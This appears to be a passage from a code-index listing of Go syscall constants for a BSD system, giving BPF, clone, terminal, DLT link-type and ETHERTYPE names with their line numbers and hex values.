BPF_ALIGNMENT (line 107) | BPF_ALIGNMENT = 0x8 constant BPF_ALIGNMENT32 (line 108) | BPF_ALIGNMENT32 = 0x4 constant BPF_ALU (line 109) | BPF_ALU = 0x4 constant BPF_AND (line 110) | BPF_AND = 0x50 constant BPF_B (line 111) | BPF_B = 0x10 constant BPF_DFLTBUFSIZE (line 112) | BPF_DFLTBUFSIZE = 0x100000 constant BPF_DIV (line 113) | BPF_DIV = 0x30 constant BPF_H (line 114) | BPF_H = 0x8 constant BPF_IMM (line 115) | BPF_IMM = 0x0 constant BPF_IND (line 116) | BPF_IND = 0x40 constant BPF_JA (line 117) | BPF_JA = 0x0 constant BPF_JEQ (line 118) | BPF_JEQ = 0x10 constant BPF_JGE (line 119) | BPF_JGE = 0x30 constant BPF_JGT (line 120) | BPF_JGT = 0x20 constant BPF_JMP (line 121) | BPF_JMP = 0x5 constant BPF_JSET (line 122) | BPF_JSET = 0x40 constant BPF_K (line 123) | BPF_K = 0x0 constant BPF_LD (line 124) | BPF_LD = 0x0 constant BPF_LDX (line 125) | BPF_LDX = 0x1 constant BPF_LEN (line 126) | BPF_LEN = 0x80 constant BPF_LSH (line 127) | BPF_LSH = 0x60 constant BPF_MAJOR_VERSION (line 128) | BPF_MAJOR_VERSION = 0x1 constant BPF_MAXBUFSIZE (line 129) | BPF_MAXBUFSIZE = 0x1000000 constant BPF_MAXINSNS (line 130) | BPF_MAXINSNS = 0x200 constant BPF_MEM (line 131) | BPF_MEM = 0x60 constant BPF_MEMWORDS (line 132) | BPF_MEMWORDS = 0x10 constant BPF_MINBUFSIZE (line 133) | BPF_MINBUFSIZE = 0x20 constant BPF_MINOR_VERSION (line 134) | BPF_MINOR_VERSION = 0x1 constant BPF_MISC (line 135) | BPF_MISC = 0x7 constant BPF_MSH (line 136) | BPF_MSH = 0xa0 constant BPF_MUL (line 137) | BPF_MUL = 0x20 constant BPF_NEG (line 138) | BPF_NEG = 0x80 constant BPF_OR (line 139) | BPF_OR = 0x40 constant BPF_RELEASE (line 140) | BPF_RELEASE = 0x30bb6 constant BPF_RET (line 141) | BPF_RET = 0x6 constant BPF_RSH (line 142) | BPF_RSH = 0x70 constant BPF_ST (line 143) | BPF_ST = 0x2 constant BPF_STX (line 144) | BPF_STX = 0x3 constant BPF_SUB (line 145) | BPF_SUB = 0x10 constant BPF_TAX (line 146) | BPF_TAX = 0x0 constant BPF_TXA (line 147) | BPF_TXA = 0x80 constant BPF_W (line 148) | BPF_W = 0x0 constant BPF_X (line 149) | BPF_X = 0x8 constant BRKINT (line 150) | BRKINT = 0x2 constant CFLUSH (line 151) | CFLUSH = 0xf constant CLOCAL (line 152) | CLOCAL = 0x8000 constant CLONE_CSIGNAL (line 153) | CLONE_CSIGNAL = 0xff constant CLONE_FILES (line 154) | CLONE_FILES = 0x400 constant CLONE_FS (line 155) | CLONE_FS = 0x200 constant CLONE_PID (line 156) | CLONE_PID = 0x1000 constant CLONE_PTRACE (line 157) | CLONE_PTRACE = 0x2000 constant CLONE_SIGHAND (line 158) | CLONE_SIGHAND = 0x800 constant CLONE_VFORK (line 159) | CLONE_VFORK = 0x4000 constant CLONE_VM (line 160) | CLONE_VM = 0x100 constant CPUSTATES (line 161) | CPUSTATES = 0x5 constant CP_IDLE (line 162) | CP_IDLE = 0x4 constant CP_INTR (line 163) | CP_INTR = 0x3 constant CP_NICE (line 164) | CP_NICE = 0x1 constant CP_SYS (line 165) | CP_SYS = 0x2 constant CP_USER (line 166) | CP_USER = 0x0 constant CREAD (line 167) | CREAD = 0x800 constant CRTSCTS (line 168) | CRTSCTS = 0x10000 constant CS5 (line 169) | CS5 = 0x0 constant CS6 (line 170) | CS6 = 0x100 constant CS7 (line 171) | CS7 = 0x200 constant CS8 (line 172) | CS8 = 0x300 constant CSIZE (line 173) | CSIZE = 0x300 constant CSTART (line 174) | CSTART = 0x11 constant CSTATUS (line 175) | CSTATUS = 0x14 constant CSTOP (line 176) | CSTOP = 0x13 constant CSTOPB (line 177) | CSTOPB = 0x400 constant CSUSP (line 178) | CSUSP = 0x1a constant CTL_HW (line 179) | CTL_HW = 0x6 constant CTL_KERN (line 180) | CTL_KERN = 0x1 constant CTL_MAXNAME (line 181) | CTL_MAXNAME = 0xc constant CTL_NET (line 182) | CTL_NET = 0x4 constant CTL_QUERY (line 183) | CTL_QUERY = -0x2 constant DIOCBSFLUSH (line 184) | DIOCBSFLUSH = 0x20006478 constant DLT_A429 (line 185) | DLT_A429 = 0xb8 constant DLT_A653_ICM (line 186) | DLT_A653_ICM = 0xb9 constant DLT_AIRONET_HEADER (line 187) | DLT_AIRONET_HEADER = 0x78 constant DLT_AOS (line 188) | DLT_AOS = 0xde constant DLT_APPLE_IP_OVER_IEEE1394 (line 189) | DLT_APPLE_IP_OVER_IEEE1394 = 0x8a constant DLT_ARCNET (line 190) | DLT_ARCNET = 0x7 constant DLT_ARCNET_LINUX (line 191) | DLT_ARCNET_LINUX = 0x81 constant DLT_ATM_CLIP (line 192) | DLT_ATM_CLIP = 0x13 constant DLT_ATM_RFC1483 (line 193) | DLT_ATM_RFC1483 = 0xb constant DLT_AURORA (line 194) | DLT_AURORA = 0x7e constant DLT_AX25 (line 195) | DLT_AX25 = 0x3 constant DLT_AX25_KISS (line 196) | DLT_AX25_KISS = 0xca constant DLT_BACNET_MS_TP (line 197) | DLT_BACNET_MS_TP = 0xa5 constant DLT_BLUETOOTH_HCI_H4 (line 198) | DLT_BLUETOOTH_HCI_H4 = 0xbb constant DLT_BLUETOOTH_HCI_H4_WITH_PHDR (line 199) | DLT_BLUETOOTH_HCI_H4_WITH_PHDR = 0xc9 constant DLT_CAN20B (line 200) | DLT_CAN20B = 0xbe constant DLT_CAN_SOCKETCAN (line 201) | DLT_CAN_SOCKETCAN = 0xe3 constant DLT_CHAOS (line 202) | DLT_CHAOS = 0x5 constant DLT_CISCO_IOS (line 203) | DLT_CISCO_IOS = 0x76 constant DLT_C_HDLC (line 204) | DLT_C_HDLC = 0x68 constant DLT_C_HDLC_WITH_DIR (line 205) | DLT_C_HDLC_WITH_DIR = 0xcd constant DLT_DECT (line 206) | DLT_DECT = 0xdd constant DLT_DOCSIS (line 207) | DLT_DOCSIS = 0x8f constant DLT_ECONET (line 208) | DLT_ECONET = 0x73 constant DLT_EN10MB (line 209) | DLT_EN10MB = 0x1 constant DLT_EN3MB (line 210) | DLT_EN3MB = 0x2 constant DLT_ENC (line 211) | DLT_ENC = 0x6d constant DLT_ERF (line 212) | DLT_ERF = 0xc5 constant DLT_ERF_ETH (line 213) | DLT_ERF_ETH = 0xaf constant DLT_ERF_POS (line 214) | DLT_ERF_POS = 0xb0 constant DLT_FC_2 (line 215) | DLT_FC_2 = 0xe0 constant DLT_FC_2_WITH_FRAME_DELIMS (line 216) | DLT_FC_2_WITH_FRAME_DELIMS = 0xe1 constant DLT_FDDI (line 217) | DLT_FDDI = 0xa constant DLT_FLEXRAY (line 218) | DLT_FLEXRAY = 0xd2 constant DLT_FRELAY (line 219) | DLT_FRELAY = 0x6b constant DLT_FRELAY_WITH_DIR (line 220) | DLT_FRELAY_WITH_DIR = 0xce constant DLT_GCOM_SERIAL (line 221) | DLT_GCOM_SERIAL = 0xad constant DLT_GCOM_T1E1 (line 222) | DLT_GCOM_T1E1 = 0xac constant DLT_GPF_F (line 223) | DLT_GPF_F = 0xab constant DLT_GPF_T (line 224) | DLT_GPF_T = 0xaa constant DLT_GPRS_LLC (line 225) | DLT_GPRS_LLC = 0xa9 constant DLT_GSMTAP_ABIS (line 226) | DLT_GSMTAP_ABIS = 0xda constant DLT_GSMTAP_UM (line 227) | DLT_GSMTAP_UM = 0xd9 constant DLT_HDLC (line 228) | DLT_HDLC = 0x10 constant DLT_HHDLC (line 229) | DLT_HHDLC = 0x79 constant DLT_HIPPI (line 230) | DLT_HIPPI = 0xf constant DLT_IBM_SN (line 231) | DLT_IBM_SN = 0x92 constant DLT_IBM_SP (line 232) | DLT_IBM_SP = 0x91 constant DLT_IEEE802 (line 233) | DLT_IEEE802 = 0x6 constant DLT_IEEE802_11 (line 234) | DLT_IEEE802_11 = 0x69 constant DLT_IEEE802_11_RADIO (line 235) | DLT_IEEE802_11_RADIO = 0x7f constant DLT_IEEE802_11_RADIO_AVS (line 236) | DLT_IEEE802_11_RADIO_AVS = 0xa3 constant DLT_IEEE802_15_4 (line 237) | DLT_IEEE802_15_4 = 0xc3 constant DLT_IEEE802_15_4_LINUX (line 238) | DLT_IEEE802_15_4_LINUX = 0xbf constant DLT_IEEE802_15_4_NONASK_PHY (line 239) | DLT_IEEE802_15_4_NONASK_PHY = 0xd7 constant DLT_IEEE802_16_MAC_CPS (line 240) | DLT_IEEE802_16_MAC_CPS = 0xbc constant DLT_IEEE802_16_MAC_CPS_RADIO (line 241) | DLT_IEEE802_16_MAC_CPS_RADIO = 0xc1 constant DLT_IPMB (line 242) | DLT_IPMB = 0xc7 constant DLT_IPMB_LINUX (line 243) | DLT_IPMB_LINUX = 0xd1 constant DLT_IPNET (line 244) | DLT_IPNET = 0xe2 constant DLT_IPV4 (line 245) | DLT_IPV4 = 0xe4 constant DLT_IPV6 (line 246) | DLT_IPV6 = 0xe5 constant DLT_IP_OVER_FC (line 247) | DLT_IP_OVER_FC = 0x7a constant DLT_JUNIPER_ATM1 (line 248) | DLT_JUNIPER_ATM1 = 0x89 constant DLT_JUNIPER_ATM2 (line 249) | DLT_JUNIPER_ATM2 = 0x87 constant DLT_JUNIPER_CHDLC (line 250) | DLT_JUNIPER_CHDLC = 0xb5 constant DLT_JUNIPER_ES (line 251) | DLT_JUNIPER_ES = 0x84 constant DLT_JUNIPER_ETHER (line 252) | DLT_JUNIPER_ETHER = 0xb2 constant DLT_JUNIPER_FRELAY (line 253) | DLT_JUNIPER_FRELAY = 0xb4 constant DLT_JUNIPER_GGSN (line 254) | DLT_JUNIPER_GGSN = 0x85 constant DLT_JUNIPER_ISM (line 255) | DLT_JUNIPER_ISM = 0xc2 constant DLT_JUNIPER_MFR (line 256) | DLT_JUNIPER_MFR = 0x86 constant DLT_JUNIPER_MLFR (line 257) | DLT_JUNIPER_MLFR = 0x83 constant DLT_JUNIPER_MLPPP (line 258) | DLT_JUNIPER_MLPPP = 0x82 constant DLT_JUNIPER_MONITOR (line 259) | DLT_JUNIPER_MONITOR = 0xa4 constant DLT_JUNIPER_PIC_PEER (line 260) | DLT_JUNIPER_PIC_PEER = 0xae constant DLT_JUNIPER_PPP (line 261) | DLT_JUNIPER_PPP = 0xb3 constant DLT_JUNIPER_PPPOE (line 262) | DLT_JUNIPER_PPPOE = 0xa7 constant DLT_JUNIPER_PPPOE_ATM (line 263) | DLT_JUNIPER_PPPOE_ATM = 0xa8 constant DLT_JUNIPER_SERVICES (line 264) | DLT_JUNIPER_SERVICES = 0x88 constant DLT_JUNIPER_ST (line 265) | DLT_JUNIPER_ST = 0xc8 constant DLT_JUNIPER_VP (line 266) | DLT_JUNIPER_VP = 0xb7 constant DLT_LAPB_WITH_DIR (line 267) | DLT_LAPB_WITH_DIR = 0xcf constant DLT_LAPD (line 268) | DLT_LAPD = 0xcb constant DLT_LIN (line 269) | DLT_LIN = 0xd4 constant DLT_LINUX_EVDEV (line 270) | DLT_LINUX_EVDEV = 0xd8 constant DLT_LINUX_IRDA (line 271) | DLT_LINUX_IRDA = 0x90 constant DLT_LINUX_LAPD (line 272) | DLT_LINUX_LAPD = 0xb1 constant DLT_LINUX_SLL (line 273) | DLT_LINUX_SLL = 0x71 constant DLT_LOOP (line 274) | DLT_LOOP = 0x6c constant DLT_LTALK (line 275) | DLT_LTALK = 0x72 constant DLT_MFR (line 276) | DLT_MFR = 0xb6 constant DLT_MOST (line 277) | DLT_MOST = 0xd3 constant DLT_MPLS (line 278) | DLT_MPLS = 0xdb constant DLT_MTP2 (line 279) | DLT_MTP2 = 0x8c constant DLT_MTP2_WITH_PHDR (line 280) | DLT_MTP2_WITH_PHDR = 0x8b constant DLT_MTP3 (line 281) | DLT_MTP3 = 0x8d constant DLT_NULL (line 282) | DLT_NULL = 0x0 constant DLT_PCI_EXP (line 283) | DLT_PCI_EXP = 0x7d constant DLT_PFLOG (line 284) | DLT_PFLOG = 0x75 constant DLT_PFSYNC (line 285) | DLT_PFSYNC = 0x12 constant DLT_PPI (line 286) | DLT_PPI = 0xc0 constant DLT_PPP (line 287) | DLT_PPP = 0x9 constant DLT_PPP_BSDOS (line 288) | DLT_PPP_BSDOS = 0xe constant DLT_PPP_ETHER (line 289) | DLT_PPP_ETHER = 0x33 constant DLT_PPP_PPPD (line 290) | DLT_PPP_PPPD = 0xa6 constant DLT_PPP_SERIAL (line 291) | DLT_PPP_SERIAL = 0x32 constant DLT_PPP_WITH_DIR (line 292) | DLT_PPP_WITH_DIR = 0xcc constant DLT_PRISM_HEADER (line 293) | DLT_PRISM_HEADER = 0x77 constant DLT_PRONET (line 294) | DLT_PRONET = 0x4 constant DLT_RAIF1 (line 295) | DLT_RAIF1 = 0xc6 constant DLT_RAW (line 296) | DLT_RAW = 0xc constant DLT_RAWAF_MASK (line 297) | DLT_RAWAF_MASK = 0x2240000 constant DLT_RIO (line 298) | DLT_RIO = 0x7c constant DLT_SCCP (line 299) | DLT_SCCP = 0x8e constant DLT_SITA (line 300) | DLT_SITA = 0xc4 constant DLT_SLIP (line 301) | DLT_SLIP = 0x8 constant DLT_SLIP_BSDOS (line 302) | DLT_SLIP_BSDOS = 0xd constant DLT_SUNATM (line 303) | DLT_SUNATM = 0x7b constant DLT_SYMANTEC_FIREWALL (line 304) | DLT_SYMANTEC_FIREWALL = 0x63 constant DLT_TZSP (line 305) | DLT_TZSP = 0x80 constant DLT_USB (line 306) | DLT_USB = 0xba constant DLT_USB_LINUX (line 307) | DLT_USB_LINUX = 0xbd constant DLT_USB_LINUX_MMAPPED (line 308) | DLT_USB_LINUX_MMAPPED = 0xdc constant DLT_WIHART (line 309) | DLT_WIHART = 0xdf constant DLT_X2E_SERIAL (line 310) | DLT_X2E_SERIAL = 0xd5 constant DLT_X2E_XORAYA (line 311) | DLT_X2E_XORAYA = 0xd6 constant DT_BLK (line 312) | DT_BLK = 0x6 constant DT_CHR (line 313) | DT_CHR = 0x2 constant DT_DIR (line 314) | DT_DIR = 0x4 constant DT_FIFO (line 315) | DT_FIFO = 0x1 constant DT_LNK (line 316) | DT_LNK = 0xa constant DT_REG (line 317) | DT_REG = 0x8 constant DT_SOCK (line 318) | DT_SOCK = 0xc constant DT_UNKNOWN (line 319) | DT_UNKNOWN = 0x0 constant DT_WHT (line 320) | DT_WHT = 0xe constant ECHO (line 321) | ECHO = 0x8 constant ECHOCTL (line 322) | ECHOCTL = 0x40 constant ECHOE (line 323) | ECHOE = 0x2 constant ECHOK (line 324) | ECHOK = 0x4 constant ECHOKE (line 325) | ECHOKE = 0x1 constant ECHONL (line 326) | ECHONL = 0x10 constant ECHOPRT (line 327) | ECHOPRT = 0x20 constant EMUL_LINUX (line 328) | EMUL_LINUX = 0x1 constant EMUL_LINUX32 (line 329) | EMUL_LINUX32 = 0x5 constant EMUL_MAXID (line 330) | EMUL_MAXID = 0x6 constant ETHERCAP_JUMBO_MTU (line 331) | ETHERCAP_JUMBO_MTU = 0x4 constant ETHERCAP_VLAN_HWTAGGING (line 332) | ETHERCAP_VLAN_HWTAGGING = 0x2 constant ETHERCAP_VLAN_MTU (line 333) | ETHERCAP_VLAN_MTU = 0x1 constant ETHERMIN (line 334) | ETHERMIN = 0x2e constant ETHERMTU (line 335) | ETHERMTU = 0x5dc constant ETHERMTU_JUMBO (line 336) | ETHERMTU_JUMBO = 0x2328 constant ETHERTYPE_8023 (line 337) | ETHERTYPE_8023 = 0x4 constant ETHERTYPE_AARP (line 338) | ETHERTYPE_AARP = 0x80f3 constant ETHERTYPE_ACCTON (line 339) | ETHERTYPE_ACCTON = 0x8390 constant ETHERTYPE_AEONIC (line 340) | ETHERTYPE_AEONIC = 0x8036 constant ETHERTYPE_ALPHA (line 341) | ETHERTYPE_ALPHA = 0x814a constant ETHERTYPE_AMBER (line 342) | ETHERTYPE_AMBER = 0x6008 constant ETHERTYPE_AMOEBA (line 343) | ETHERTYPE_AMOEBA = 0x8145 constant ETHERTYPE_APOLLO (line 344) | ETHERTYPE_APOLLO = 0x80f7 constant ETHERTYPE_APOLLODOMAIN (line 345) | ETHERTYPE_APOLLODOMAIN = 0x8019 constant ETHERTYPE_APPLETALK (line 346) | ETHERTYPE_APPLETALK = 0x809b constant ETHERTYPE_APPLITEK (line 347) | ETHERTYPE_APPLITEK = 0x80c7 constant ETHERTYPE_ARGONAUT (line 348) | ETHERTYPE_ARGONAUT = 0x803a constant ETHERTYPE_ARP (line 349) | ETHERTYPE_ARP = 0x806 constant ETHERTYPE_AT (line 350) | ETHERTYPE_AT = 0x809b constant ETHERTYPE_ATALK (line 351) | ETHERTYPE_ATALK = 0x809b constant ETHERTYPE_ATOMIC (line 352) | ETHERTYPE_ATOMIC = 0x86df constant ETHERTYPE_ATT (line 353) | ETHERTYPE_ATT = 0x8069 constant ETHERTYPE_ATTSTANFORD (line 354) | ETHERTYPE_ATTSTANFORD = 0x8008 constant ETHERTYPE_AUTOPHON (line 355) | ETHERTYPE_AUTOPHON = 0x806a constant ETHERTYPE_AXIS (line 356) | ETHERTYPE_AXIS = 0x8856 constant ETHERTYPE_BCLOOP (line 357) | ETHERTYPE_BCLOOP = 0x9003 constant ETHERTYPE_BOFL (line 358) | ETHERTYPE_BOFL = 0x8102 constant ETHERTYPE_CABLETRON (line 359) | ETHERTYPE_CABLETRON = 0x7034 constant ETHERTYPE_CHAOS (line 360) | ETHERTYPE_CHAOS = 0x804 constant ETHERTYPE_COMDESIGN (line 361) | ETHERTYPE_COMDESIGN = 0x806c constant ETHERTYPE_COMPUGRAPHIC (line 362) | ETHERTYPE_COMPUGRAPHIC = 0x806d constant ETHERTYPE_COUNTERPOINT (line 363) | ETHERTYPE_COUNTERPOINT = 0x8062 constant ETHERTYPE_CRONUS (line 364) | ETHERTYPE_CRONUS = 0x8004 constant ETHERTYPE_CRONUSVLN (line 365) | ETHERTYPE_CRONUSVLN = 0x8003 constant ETHERTYPE_DCA (line 366) | ETHERTYPE_DCA = 0x1234 constant ETHERTYPE_DDE (line 367) | ETHERTYPE_DDE = 0x807b constant ETHERTYPE_DEBNI (line 368) | ETHERTYPE_DEBNI = 0xaaaa constant ETHERTYPE_DECAM (line 369) | ETHERTYPE_DECAM = 0x8048 constant ETHERTYPE_DECCUST (line 370) | ETHERTYPE_DECCUST = 0x6006 constant ETHERTYPE_DECDIAG (line 371) | ETHERTYPE_DECDIAG = 0x6005 constant ETHERTYPE_DECDNS (line 372) | ETHERTYPE_DECDNS = 0x803c constant ETHERTYPE_DECDTS (line 373) | ETHERTYPE_DECDTS = 0x803e constant ETHERTYPE_DECEXPER (line 374) | ETHERTYPE_DECEXPER = 0x6000 constant ETHERTYPE_DECLAST (line 375) | ETHERTYPE_DECLAST = 0x8041 constant ETHERTYPE_DECLTM (line 376) | ETHERTYPE_DECLTM = 0x803f constant ETHERTYPE_DECMUMPS (line 377) | ETHERTYPE_DECMUMPS = 0x6009 constant ETHERTYPE_DECNETBIOS (line 378) | ETHERTYPE_DECNETBIOS = 0x8040 constant ETHERTYPE_DELTACON (line 379) | ETHERTYPE_DELTACON = 0x86de constant ETHERTYPE_DIDDLE (line 380) | ETHERTYPE_DIDDLE = 0x4321 constant ETHERTYPE_DLOG1 (line 381) | ETHERTYPE_DLOG1 = 0x660 constant ETHERTYPE_DLOG2 (line 382) | ETHERTYPE_DLOG2 = 0x661 constant ETHERTYPE_DN (line 383) | ETHERTYPE_DN = 0x6003 constant ETHERTYPE_DOGFIGHT (line 384) | ETHERTYPE_DOGFIGHT = 0x1989 constant ETHERTYPE_DSMD (line 385) | ETHERTYPE_DSMD = 0x8039 constant ETHERTYPE_ECMA (line 386) | ETHERTYPE_ECMA = 0x803 constant ETHERTYPE_ENCRYPT (line 387) | ETHERTYPE_ENCRYPT = 0x803d constant ETHERTYPE_ES (line 388) | ETHERTYPE_ES = 0x805d constant ETHERTYPE_EXCELAN (line 389) | ETHERTYPE_EXCELAN = 0x8010 constant ETHERTYPE_EXPERDATA (line 390) | ETHERTYPE_EXPERDATA = 0x8049 constant ETHERTYPE_FLIP (line 391) | ETHERTYPE_FLIP = 0x8146 constant ETHERTYPE_FLOWCONTROL (line 392) | ETHERTYPE_FLOWCONTROL = 0x8808 constant ETHERTYPE_FRARP (line 393) | ETHERTYPE_FRARP = 0x808 constant ETHERTYPE_GENDYN (line 394) | ETHERTYPE_GENDYN = 0x8068 constant ETHERTYPE_HAYES (line 395) | ETHERTYPE_HAYES = 0x8130 constant ETHERTYPE_HIPPI_FP (line 396) | ETHERTYPE_HIPPI_FP = 0x8180 constant ETHERTYPE_HITACHI (line 397) | ETHERTYPE_HITACHI = 0x8820 constant ETHERTYPE_HP (line 398) | ETHERTYPE_HP = 0x8005 constant ETHERTYPE_IEEEPUP (line 399) | ETHERTYPE_IEEEPUP = 0xa00 constant ETHERTYPE_IEEEPUPAT (line 400) | ETHERTYPE_IEEEPUPAT = 0xa01 constant ETHERTYPE_IMLBL (line 401) | ETHERTYPE_IMLBL = 0x4c42 constant ETHERTYPE_IMLBLDIAG (line 402) | ETHERTYPE_IMLBLDIAG = 0x424c constant ETHERTYPE_IP (line 403) | ETHERTYPE_IP = 0x800 constant ETHERTYPE_IPAS (line 404) | ETHERTYPE_IPAS = 0x876c constant ETHERTYPE_IPV6 (line 405) | ETHERTYPE_IPV6 = 0x86dd constant ETHERTYPE_IPX (line 406) | ETHERTYPE_IPX = 0x8137 constant ETHERTYPE_IPXNEW (line 407) | ETHERTYPE_IPXNEW = 0x8037 constant ETHERTYPE_KALPANA (line 408) | ETHERTYPE_KALPANA = 0x8582 constant ETHERTYPE_LANBRIDGE (line 409) | ETHERTYPE_LANBRIDGE = 0x8038 constant ETHERTYPE_LANPROBE (line 410) | ETHERTYPE_LANPROBE = 0x8888 constant ETHERTYPE_LAT (line 411) | ETHERTYPE_LAT = 0x6004 constant ETHERTYPE_LBACK (line 412) | ETHERTYPE_LBACK = 0x9000 constant ETHERTYPE_LITTLE (line 413) | ETHERTYPE_LITTLE = 0x8060 constant ETHERTYPE_LOGICRAFT (line 414) | ETHERTYPE_LOGICRAFT = 0x8148 constant ETHERTYPE_LOOPBACK (line 415) | ETHERTYPE_LOOPBACK = 0x9000 constant ETHERTYPE_MATRA (line 416) | ETHERTYPE_MATRA = 0x807a constant ETHERTYPE_MAX (line 417) | ETHERTYPE_MAX = 0xffff constant ETHERTYPE_MERIT (line 418) | ETHERTYPE_MERIT = 0x807c constant ETHERTYPE_MICP (line 419) | ETHERTYPE_MICP = 0x873a constant ETHERTYPE_MOPDL (line 420) | ETHERTYPE_MOPDL = 0x6001 constant ETHERTYPE_MOPRC (line 421) | ETHERTYPE_MOPRC = 0x6002 constant ETHERTYPE_MOTOROLA (line 422) | ETHERTYPE_MOTOROLA = 0x818d constant ETHERTYPE_MPLS (line 423) | ETHERTYPE_MPLS = 0x8847 constant ETHERTYPE_MPLS_MCAST (line 424) | ETHERTYPE_MPLS_MCAST = 0x8848 constant ETHERTYPE_MUMPS (line 425) | ETHERTYPE_MUMPS = 0x813f constant ETHERTYPE_NBPCC (line 426) | ETHERTYPE_NBPCC = 0x3c04 constant ETHERTYPE_NBPCLAIM (line 427) | ETHERTYPE_NBPCLAIM = 0x3c09 constant ETHERTYPE_NBPCLREQ (line 428) | ETHERTYPE_NBPCLREQ = 0x3c05 constant ETHERTYPE_NBPCLRSP (line 429) | ETHERTYPE_NBPCLRSP = 0x3c06 constant ETHERTYPE_NBPCREQ (line 430) | ETHERTYPE_NBPCREQ = 0x3c02 constant ETHERTYPE_NBPCRSP (line 431) | ETHERTYPE_NBPCRSP = 0x3c03 constant ETHERTYPE_NBPDG (line 432) | ETHERTYPE_NBPDG = 0x3c07 constant ETHERTYPE_NBPDGB (line 433) | ETHERTYPE_NBPDGB = 0x3c08 constant ETHERTYPE_NBPDLTE (line 434) | ETHERTYPE_NBPDLTE = 0x3c0a constant ETHERTYPE_NBPRAR (line 435) | ETHERTYPE_NBPRAR = 0x3c0c constant ETHERTYPE_NBPRAS (line 436) | ETHERTYPE_NBPRAS = 0x3c0b constant ETHERTYPE_NBPRST (line 437) | ETHERTYPE_NBPRST = 0x3c0d constant ETHERTYPE_NBPSCD (line 438) | ETHERTYPE_NBPSCD = 0x3c01 constant ETHERTYPE_NBPVCD (line 439) | ETHERTYPE_NBPVCD = 0x3c00 constant ETHERTYPE_NBS (line 440) | ETHERTYPE_NBS = 0x802 constant ETHERTYPE_NCD (line 441) | ETHERTYPE_NCD = 0x8149 constant ETHERTYPE_NESTAR (line 442) | ETHERTYPE_NESTAR = 0x8006 constant ETHERTYPE_NETBEUI (line 443) | ETHERTYPE_NETBEUI = 0x8191 constant ETHERTYPE_NOVELL (line 444) | ETHERTYPE_NOVELL = 0x8138 constant ETHERTYPE_NS (line 445) | ETHERTYPE_NS = 0x600 constant ETHERTYPE_NSAT (line 446) | ETHERTYPE_NSAT = 0x601 constant ETHERTYPE_NSCOMPAT (line 447) | ETHERTYPE_NSCOMPAT = 0x807 constant ETHERTYPE_NTRAILER (line 448) | ETHERTYPE_NTRAILER = 0x10 constant ETHERTYPE_OS9 (line 449) | ETHERTYPE_OS9 = 0x7007 constant ETHERTYPE_OS9NET (line 450) | ETHERTYPE_OS9NET = 0x7009 constant ETHERTYPE_PACER (line 451) | ETHERTYPE_PACER = 0x80c6 constant ETHERTYPE_PAE (line 452) | ETHERTYPE_PAE = 0x888e constant ETHERTYPE_PCS (line 453) | ETHERTYPE_PCS = 0x4242 constant ETHERTYPE_PLANNING (line 454) | ETHERTYPE_PLANNING = 0x8044 constant ETHERTYPE_PPP (line 455) | ETHERTYPE_PPP = 0x880b constant ETHERTYPE_PPPOE (line 456) | ETHERTYPE_PPPOE = 0x8864 constant ETHERTYPE_PPPOEDISC (line 457) | ETHERTYPE_PPPOEDISC = 0x8863 constant ETHERTYPE_PRIMENTS (line 458) | ETHERTYPE_PRIMENTS = 0x7031 constant ETHERTYPE_PUP (line 459) | ETHERTYPE_PUP = 0x200 constant ETHERTYPE_PUPAT (line 460) | ETHERTYPE_PUPAT = 0x200 constant ETHERTYPE_RACAL (line 461) | ETHERTYPE_RACAL = 0x7030 constant ETHERTYPE_RATIONAL (line 462) | ETHERTYPE_RATIONAL = 0x8150 constant ETHERTYPE_RAWFR (line 463) | ETHERTYPE_RAWFR = 0x6559 constant ETHERTYPE_RCL (line 464) | ETHERTYPE_RCL = 0x1995 constant ETHERTYPE_RDP (line 465) | ETHERTYPE_RDP = 0x8739 constant ETHERTYPE_RETIX (line 466) | ETHERTYPE_RETIX = 0x80f2 constant ETHERTYPE_REVARP (line 467) | ETHERTYPE_REVARP = 0x8035 constant ETHERTYPE_SCA (line 468) | ETHERTYPE_SCA = 0x6007 constant ETHERTYPE_SECTRA (line 469) | ETHERTYPE_SECTRA = 0x86db constant ETHERTYPE_SECUREDATA (line 470) | ETHERTYPE_SECUREDATA = 0x876d constant ETHERTYPE_SGITW (line 471) | ETHERTYPE_SGITW = 0x817e constant ETHERTYPE_SG_BOUNCE (line 472) | ETHERTYPE_SG_BOUNCE = 0x8016 constant ETHERTYPE_SG_DIAG (line 473) | ETHERTYPE_SG_DIAG = 0x8013 constant ETHERTYPE_SG_NETGAMES (line 474) | ETHERTYPE_SG_NETGAMES = 0x8014 constant ETHERTYPE_SG_RESV (line 475) | ETHERTYPE_SG_RESV = 0x8015 constant ETHERTYPE_SIMNET (line 476) | ETHERTYPE_SIMNET = 0x5208 constant ETHERTYPE_SLOWPROTOCOLS (line 477) | ETHERTYPE_SLOWPROTOCOLS = 0x8809 constant ETHERTYPE_SNA (line 478) | ETHERTYPE_SNA = 0x80d5 constant ETHERTYPE_SNMP (line 479) | ETHERTYPE_SNMP = 0x814c constant ETHERTYPE_SONIX (line 480) | ETHERTYPE_SONIX = 0xfaf5 constant ETHERTYPE_SPIDER (line 481) | ETHERTYPE_SPIDER = 0x809f constant ETHERTYPE_SPRITE (line 482) | ETHERTYPE_SPRITE = 0x500 constant ETHERTYPE_STP (line 483) | ETHERTYPE_STP = 0x8181 constant ETHERTYPE_TALARIS (line 484) | ETHERTYPE_TALARIS = 0x812b constant ETHERTYPE_TALARISMC (line 485) | ETHERTYPE_TALARISMC = 0x852b constant ETHERTYPE_TCPCOMP (line 486) | ETHERTYPE_TCPCOMP = 0x876b constant ETHERTYPE_TCPSM (line 487) | ETHERTYPE_TCPSM = 0x9002 constant ETHERTYPE_TEC (line 488) | ETHERTYPE_TEC = 0x814f constant ETHERTYPE_TIGAN (line 489) | ETHERTYPE_TIGAN = 0x802f constant ETHERTYPE_TRAIL (line 490) | ETHERTYPE_TRAIL = 0x1000 constant ETHERTYPE_TRANSETHER (line 491) | ETHERTYPE_TRANSETHER = 0x6558 constant ETHERTYPE_TYMSHARE (line 492) | ETHERTYPE_TYMSHARE = 0x802e constant ETHERTYPE_UBBST (line 493) | ETHERTYPE_UBBST = 0x7005 constant ETHERTYPE_UBDEBUG (line 494) | ETHERTYPE_UBDEBUG = 0x900 constant ETHERTYPE_UBDIAGLOOP (line 495) | ETHERTYPE_UBDIAGLOOP = 0x7002 constant ETHERTYPE_UBDL (line 496) | ETHERTYPE_UBDL = 0x7000 constant ETHERTYPE_UBNIU (line 497) | ETHERTYPE_UBNIU = 0x7001 constant ETHERTYPE_UBNMC (line 498) | ETHERTYPE_UBNMC = 0x7003 constant ETHERTYPE_VALID (line 499) | ETHERTYPE_VALID = 0x1600 constant 